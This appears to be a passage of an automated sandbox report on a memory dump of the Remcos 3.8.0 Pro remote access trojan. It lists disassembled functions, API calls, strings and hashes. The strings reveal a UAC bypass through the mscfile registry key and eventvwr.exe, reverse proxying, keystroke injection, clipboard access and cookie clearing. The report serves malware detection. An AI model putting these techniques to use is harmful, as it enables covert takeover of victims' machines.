                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                              • API String ID: 1462127192-2001430897
                                                              • Opcode ID: 89042844ea69c012f879509e63a0fc77e1d89c723a44a4c2729b90cb107ed66e
                                                              • Instruction ID: c959f07cd39d7bf5aa9877836fa4e600e3befaf0fecdab9036ea9ab6b21d27b7
                                                              • Opcode Fuzzy Hash: 89042844ea69c012f879509e63a0fc77e1d89c723a44a4c2729b90cb107ed66e
                                                              • Instruction Fuzzy Hash: 44319635A433095FEF08FBA4ECA1EFE7738EFA0614F40016AE5066B191EF61594ADA50
                                                              Function 030966A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 03096775
                                                              • ExitProcess.KERNEL32 ref: 03096782
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExecuteExitProcessShell
                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                              • API String ID: 1124553745-2519146888
                                                              • Opcode ID: cb2ed4b98d4c8997c37937b558a329165dd5168a480b7f9b0aa7d5012bf6adb9
                                                              • Instruction ID: 97596e111b9ee46ec9844db2db6fd3e51e2f4b1c36166bc5c0f4008b72bd2af2
                                                              • Opcode Fuzzy Hash: cb2ed4b98d4c8997c37937b558a329165dd5168a480b7f9b0aa7d5012bf6adb9
                                                              • Instruction Fuzzy Hash: 9A112739B473097FFE08F2A4DC66FEF32689B94620F00045BF616AE1C1DF6119058395
                                                              Function 030AAA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AllocConsole.KERNEL32(00000000), ref: 030AAA5D
                                                              • ShowWindow.USER32(00000000,00000000), ref: 030AAA76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocConsoleShowWindow
                                                              • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                              • API String ID: 4118500197-4025029772
                                                              • Opcode ID: 8fa24124e20603d038b82d97493a5eb258d152386ea69792aa7437077fde93a0
                                                              • Instruction ID: 769025ca3338d80734ad8ba39f3a1f47345b66d8aa3f57c337c1a0d48b2b3442
                                                              • Opcode Fuzzy Hash: 8fa24124e20603d038b82d97493a5eb258d152386ea69792aa7437077fde93a0
                                                              • Instruction Fuzzy Hash: 86016DB6A9235DAEDB10FBF4AC45FDE77ACBB45B05F040419B210EE445DBA891088B61
                                                              Function 030AB212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 030AB22B
                                                                • Part of subcall function 030AB2C4: RegisterClassExA.USER32(00000030), ref: 030AB310
                                                                • Part of subcall function 030AB2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 030AB32B
                                                                • Part of subcall function 030AB2C4: GetLastError.KERNEL32 ref: 030AB335
                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 030AB262
                                                              • lstrcpynA.KERNEL32(03101AF8,Remcos,00000080), ref: 030AB27C
                                                              • Shell_NotifyIconA.SHELL32(00000000,03101AE0), ref: 030AB292
                                                              • TranslateMessage.USER32(?), ref: 030AB29E
                                                              • DispatchMessageA.USER32(?), ref: 030AB2A8
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 030AB2B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                              • String ID: Remcos
                                                              • API String ID: 1970332568-165870891
                                                              • Opcode ID: c8c67cccc05f2cc965824a73764230bb0a512dc1956b192854becd5b0cfef3bf
                                                              • Instruction ID: c6a3709b525b134e6ccba09f0c6578816df9d1393d7186ff440844a7c6c7f650
                                                              • Opcode Fuzzy Hash: c8c67cccc05f2cc965824a73764230bb0a512dc1956b192854becd5b0cfef3bf
                                                              • Instruction Fuzzy Hash: 7C012775A01288FBD710EBE5F908E9F7BBCAB89B05F00002AF115A6085D7FD50458B60
                                                              Function 030D9F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6c00e23a5c8888094fd5ebe535572d8408c38c14bc3cacc995a7ae6410e6ff3
                                                              • Instruction ID: 6965c2e42c91f7a930872383961b8e60465982ebcde3543a89654386360d1b1d
                                                              • Opcode Fuzzy Hash: a6c00e23a5c8888094fd5ebe535572d8408c38c14bc3cacc995a7ae6410e6ff3
                                                              • Instruction Fuzzy Hash: 7CC1AB78B06389AFCB51DFADD840BEDBBF4AF4A310F084188E855AB381C7359951CB61
                                                              Function 030E2DBB Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030E2A89: CreateFileW.KERNEL32(00000000,00000000,?,030E2E64,?,?,00000000,?,030E2E64,00000000,0000000C), ref: 030E2AA6
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 030E2ECF
                                                              • __dosmaperr.LIBCMT ref: 030E2ED6
                                                              • GetFileType.KERNEL32(00000000), ref: 030E2EE2
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 030E2EEC
                                                              • __dosmaperr.LIBCMT ref: 030E2EF5
                                                              • CloseHandle.KERNEL32(00000000), ref: 030E2F15
                                                              • CloseHandle.KERNEL32(00000000), ref: 030E305F
                                                              • GetLastError.KERNEL32 ref: 030E3091
                                                              • __dosmaperr.LIBCMT ref: 030E3098
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID:
                                                              • API String ID: 4237864984-0
                                                              • Opcode ID: 81247aad67036b345f845614d4d4f6be72d87d2c36324c39b061c17aaf794f51
                                                              • Instruction ID: 2c7d1b9622e087e3456a25503186cf00c7ece05d01fd624ec51a85b4d6c0edb8
                                                              • Opcode Fuzzy Hash: 81247aad67036b345f845614d4d4f6be72d87d2c36324c39b061c17aaf794f51
                                                              • Instruction Fuzzy Hash: 8BA13536B112498FDF19EF68D8517EE7BE8EB4A320F18019DE8129F390DB358812C751
                                                              Function 030E0F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,030E123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 030E100F
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E1092
                                                              • __alloca_probe_16.LIBCMT ref: 030E10CA
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,030E123C,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E1125
                                                              • __alloca_probe_16.LIBCMT ref: 030E1174
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E113C
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,030E123C,00000000,00000000,?,00000001,?,?,?,?), ref: 030E11B8
                                                              • __freea.LIBCMT ref: 030E11E3
                                                              • __freea.LIBCMT ref: 030E11EF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                              • String ID:
                                                              • API String ID: 201697637-0
                                                              • Opcode ID: 412abfa2dea458e8f6268df9311f4867851977a8a70343f5a01ef84a27e48e4f
                                                              • Instruction ID: 05077c46b95687416612da7f3028ba17ece23f53c6df8bbd8fc80c0be629b469
                                                              • Opcode Fuzzy Hash: 412abfa2dea458e8f6268df9311f4867851977a8a70343f5a01ef84a27e48e4f
                                                              • Instruction Fuzzy Hash: 3491D675F022569FDB28DEA9CC80EEEBBF6AF49610F0C4599E905EB140D775D840CB60
                                                              Function 030D268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030D5725: GetLastError.KERNEL32(?,?,030C8595,?,?,?,030C8C17,030C988A,?,03101E78), ref: 030D5729
                                                                • Part of subcall function 030D5725: _free.LIBCMT ref: 030D575C
                                                                • Part of subcall function 030D5725: SetLastError.KERNEL32(00000000,?,03101E78,?,?,?,?,?,?,?,?,?,030C988A,00000000,030A52D9,00000000), ref: 030D579D
                                                                • Part of subcall function 030D5725: _abort.LIBCMT ref: 030D57A3
                                                              • _memcmp.LIBVCRUNTIME ref: 030D2935
                                                              • _free.LIBCMT ref: 030D29A6
                                                              • _free.LIBCMT ref: 030D29BF
                                                              • _free.LIBCMT ref: 030D29F1
                                                              • _free.LIBCMT ref: 030D29FA
                                                              • _free.LIBCMT ref: 030D2A06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                              • String ID: C
                                                              • API String ID: 1679612858-1037565863
                                                              • Opcode ID: da0182574ce698ce107c5025a5ed6d878dac7008369fb58c0df462eb9767ee46
                                                              • Instruction ID: 070dba5507debf2acf36b912e0a622a10c507576bab58c5ecb98e08628f15fc0
                                                              • Opcode Fuzzy Hash: da0182574ce698ce107c5025a5ed6d878dac7008369fb58c0df462eb9767ee46
                                                              • Instruction Fuzzy Hash: EDB1F975A023199FDB64DF18C884AADB7F8FB48314F1489EAD949A7250E731AE90CF50
                                                              Function 030A3360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tcp$udp
                                                              • API String ID: 0-3725065008
                                                              • Opcode ID: ffb9d28c5d7f8fb6eecbbb9d4610718e236f907b121a144b823a08b908fd09ce
                                                              • Instruction ID: d126674c25b82857720e41e228220b5acc206a4bf8cba297f30527a0e0e9286d
                                                              • Opcode Fuzzy Hash: ffb9d28c5d7f8fb6eecbbb9d4610718e236f907b121a144b823a08b908fd09ce
                                                              • Instruction Fuzzy Hash: 3271B07960AB028FD766CFEDE44562BB7E4EF84640F0848BEF88587250DB74D944CB42
                                                              Function 0309FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Eventinet_ntoa
                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                              • API String ID: 3578746661-168337528
                                                              • Opcode ID: 2a7608c5c3a4ec3fe8ac6448883a15bd5b57510fb69564f2ed9c740e0427cd75
                                                              • Instruction ID: 11ff4fd713d08a40de5ac44478e39dd2167798fe37806cefad2177d9f9bc45b1
                                                              • Opcode Fuzzy Hash: 2a7608c5c3a4ec3fe8ac6448883a15bd5b57510fb69564f2ed9c740e0427cd75
                                                              • Instruction Fuzzy Hash: 3B51D635B077099FEB08FB7CE825AAE76A5AFC1200F50091AE5418F6D5EF348905D7C2
                                                              Function 030A601D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A626A: __EH_prolog.LIBCMT ref: 030A626F
                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 030A60E6
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,030F3050), ref: 030A611A
                                                              • CloseHandle.KERNEL32(00000000), ref: 030A6123
                                                              • DeleteFileA.KERNEL32(00000000), ref: 030A6132
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWait
                                                              • String ID: <$@$Temp
                                                              • API String ID: 2516244461-1032778388
                                                              • Opcode ID: 6c6c51350b4c9506060e444ecd3e2bb8611de51e77c6a6aa6a80d954ea0d32c7
                                                              • Instruction ID: 7ffed5dafac216e0ba26bd7f21b9fb901e06a369e4dcd3a27425367bf12e4ad9
                                                              • Opcode Fuzzy Hash: 6c6c51350b4c9506060e444ecd3e2bb8611de51e77c6a6aa6a80d954ea0d32c7
                                                              • Instruction Fuzzy Hash: 2E419339A0220D9BEF14FBA4DC65AEDB738AF90300F44015AE1066E0D1EF751A4ADB90
                                                              Function 030969F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,03101E78,030F2F54,?,00000000,0309708D,00000000), ref: 03096A56
                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0309708D,00000000,?,?,0000000A,00000000), ref: 03096A9E
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,0309708D,00000000,?,?,0000000A,00000000), ref: 03096ADE
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 03096AFB
                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 03096B26
                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 03096B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateDeleteMoveWrite
                                                              • String ID: .part
                                                              • API String ID: 1511717022-3499674018
                                                              • Opcode ID: f2615a9a9ab3a501e206c5e1c412d311c776037aedbbbf9a9fe992ef7be42e8b
                                                              • Instruction ID: 2029b7ed151dbd999f0e5035eaf3ddca2c022c9949c2e1b3f70f137645a6cf13
                                                              • Opcode Fuzzy Hash: f2615a9a9ab3a501e206c5e1c412d311c776037aedbbbf9a9fe992ef7be42e8b
                                                              • Instruction Fuzzy Hash: 1531CE75606309AFE614EF60D8449EFB3ECFFD0710F00491FF5869A150DB79AA488B92
                                                              Function 030D6FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,030BBAB6,?,?,?,030D7215,00000001,00000001,?), ref: 030D701E
                                                              • __alloca_probe_16.LIBCMT ref: 030D7056
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,030BBAB6,?,?,?,030D7215,00000001,00000001,?), ref: 030D70A4
                                                              • __alloca_probe_16.LIBCMT ref: 030D713B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 030D719E
                                                              • __freea.LIBCMT ref: 030D71AB
                                                                • Part of subcall function 030D3649: RtlAllocateHeap.NTDLL(00000000,030C3069,?,?,030C65E7,?,?,?,?,?,0309C88A,030C3069,?,?,?,?), ref: 030D367B
                                                              • __freea.LIBCMT ref: 030D71B4
                                                              • __freea.LIBCMT ref: 030D71D9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3864826663-0
                                                              • Opcode ID: 49918ec9c824158ad6ceb0584c88325afd0c5e2ccb1741be53acb65b61da59d1
                                                              • Instruction ID: f298c54963c9e8fbe03b03658a717a65ccb7ff7d816c29d2405fdef6a3b5e294
                                                              • Opcode Fuzzy Hash: 49918ec9c824158ad6ceb0584c88325afd0c5e2ccb1741be53acb65b61da59d1
                                                              • Instruction Fuzzy Hash: 8C51E276612316AFEB25CE68DC40EAFB7E9EB81A50F194769FD04DA140EB35DC4086A0
                                                              Function 030A7949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 030A7982
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79A3
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79C3
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79D7
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 030A79ED
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 030A7A0A
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 030A7A25
                                                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 030A7A41
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InputSend
                                                              • String ID:
                                                              • API String ID: 3431551938-0
                                                              • Opcode ID: 5650fb5fe40bd7d6b0a049c3e449c0cfec1b924ff7311cfec4eae911378dd99b
                                                              • Instruction ID: c688ef94f12c28b68e450bf5d3cf7cb9cbd082d4d453a9f06a65c86c10061c2b
                                                              • Opcode Fuzzy Hash: 5650fb5fe40bd7d6b0a049c3e449c0cfec1b924ff7311cfec4eae911378dd99b
                                                              • Instruction Fuzzy Hash: C03181715583086EE311CF95D941BEBBBDCEF99B54F04080FF6809A191D2E296898BA3
                                                              Function 030A4F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlock
                                                              • String ID:
                                                              • API String ID: 2813074840-0
                                                              • Opcode ID: d2930a2e17aead4b5bd06e7da8889d9258e1ca72bf5ffa3ecbbc2f5924b7558f
                                                              • Instruction ID: b6dbae58a9891feb41350d7f525bc6a904e15cebb50850aef98179bc019bde87
                                                              • Opcode Fuzzy Hash: d2930a2e17aead4b5bd06e7da8889d9258e1ca72bf5ffa3ecbbc2f5924b7558f
                                                              • Instruction Fuzzy Hash: 3F01C0353473088BD704FBB8FC186AEB3A8FFE1A11F44095EE54B8A185EF7598098A51
                                                              Function 030D7757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,030D7ECC,030E3EB5,00000000,00000000,00000000,00000000,00000000), ref: 030D7799
                                                              • __fassign.LIBCMT ref: 030D7814
                                                              • __fassign.LIBCMT ref: 030D782F
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 030D7855
                                                              • WriteFile.KERNEL32(?,00000000,00000000,030D7ECC,00000000,?,?,?,?,?,?,?,?,?,030D7ECC,030E3EB5), ref: 030D7874
                                                              • WriteFile.KERNEL32(?,030E3EB5,00000001,030D7ECC,00000000,?,?,?,?,?,?,?,?,?,030D7ECC,030E3EB5), ref: 030D78AD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: d7bec75674ee1c68019ddb76448727f921e88652e63cd8075e6682b73798872c
                                                              • Instruction ID: 37360cf1e2a67a76d4001ddc25fe8396429fcf8e0a7634cd167a33420d8eb005
                                                              • Opcode Fuzzy Hash: d7bec75674ee1c68019ddb76448727f921e88652e63cd8075e6682b73798872c
                                                              • Instruction Fuzzy Hash: F551C070E013499FDB10DFA8D895AEEFBF8EF09700F18416AE955E7281E734A941CB60
                                                              Function 0309AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030A1F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,00000000,00000000,00000000), ref: 030A1FB5
                                                                • Part of subcall function 030A1F91: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 030A1FD2
                                                                • Part of subcall function 030A1F91: RegCloseKey.KERNEL32(00000000), ref: 030A1FDD
                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0309AEAC
                                                              • PathFileExistsA.SHLWAPI(?), ref: 0309AEB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                              • API String ID: 1133728706-4073444585
                                                              • Opcode ID: f5c124008a63afdedfb90245879507302ef8ebf99f66af3e7f8e2dca0c89344f
                                                              • Instruction ID: 545943186f23c51a2b82be6cfee414f7f6330960712ed152b9878587ff2fed0d
                                                              • Opcode Fuzzy Hash: f5c124008a63afdedfb90245879507302ef8ebf99f66af3e7f8e2dca0c89344f
                                                              • Instruction Fuzzy Hash: 4921EE38B4230D6FEF08F7E4DC669EE7368AFD1210F84055AD5026F181EF255A0AE691
                                                              Function 030E3D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24a2a1848c3663a2054694378d219791553ac8b20ca283d2023086f66f67b1e1
                                                              • Instruction ID: 166e00b30eb834b6bd5ae5e87e0251bf24b731b0ec2d7e14cd775e646fa1905f
                                                              • Opcode Fuzzy Hash: 24a2a1848c3663a2054694378d219791553ac8b20ca283d2023086f66f67b1e1
                                                              • Instruction Fuzzy Hash: E211A279B1B359BFCB51ABB6AC049AF7FACDFC5731B104699F8168B150DA3588008660
                                                              Function 030DE0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 030DDE21: _free.LIBCMT ref: 030DDE4A
                                                              • _free.LIBCMT ref: 030DE128
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
